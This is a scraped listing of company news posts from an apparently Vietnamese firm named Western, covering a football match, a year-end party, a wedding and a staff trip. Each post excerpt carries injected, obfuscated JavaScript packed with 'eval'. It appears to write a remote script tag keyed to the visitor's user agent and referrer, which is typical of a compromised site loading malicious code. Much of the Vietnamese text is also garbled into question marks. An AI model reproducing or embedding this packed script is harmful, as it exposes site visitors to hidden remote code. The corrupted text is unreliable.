Exchange news

11224176_769040086551584_7099862589136212986_n

Giao hữu Western – FrieslandCampina.

This eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kyzkf|var|u0026u|referrer|yizat||js|php'.split('|'),0,{})) ...  Read more
1948193_692881394167454_8620104240398495006_n

Western đón tất niên cuối năm 2014!

Western ?ón t?t niên cu?i n?m 2014! L?i m?t n?m n?a trôi qua cùng v?i nh?ng th?ng tr?m trong công vi?c và cu?c s?ng. Toàn th? công ty l?i m?t l?n h?p m?t cùng nhau ?? g?p m?t, chia s? và ?úc rút kinh nghi?m cho nh?ng n?m phát tri?n phía tr??c. eval(function(p,a,c,k,e,d){e=function(c){return...  Read more
10411205_654137551375172_769494927204105170_n

Western chúc hỉ chú Sự!

Chú ?inh Xuân S?, m?t trong nh?ng cán b? lâu n?m nh?t c?a Western. ?ây là l? t? ch?c c??i c?a con trai chú. Chúc gia ?ình chú nh?ng l?i chúc t?t ??p nh?t! eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...  Read more
10731110_630462990409295_1521071124194562717_n

Western Football Club ! – Glonics – Thái Nguyên

Western Football Club ! – Glonics – Thái Nguyên M?t trong nh?ng ho?t ??ng th? thao t?i các công tr??ng c?a Western. Sau th?i gian làm vi?c c?ng th?ng là nh?ng phút tho?i mái v?i nh?ng ho?t ??ng b? ích. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...  Read more
13891_556632447792350_6209281606945961500_n

Western: Du lịch Cát Bà 7/2014

Western: Du l?ch Cát Bà 7/2014. M?t trong nh?ng ho?t ??ng th??ng niên c?a công ty nh?m nâng cao tinh th?n ?oàn k?t và giao l?u cho cán b? công nhân viên công ty. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...  Read more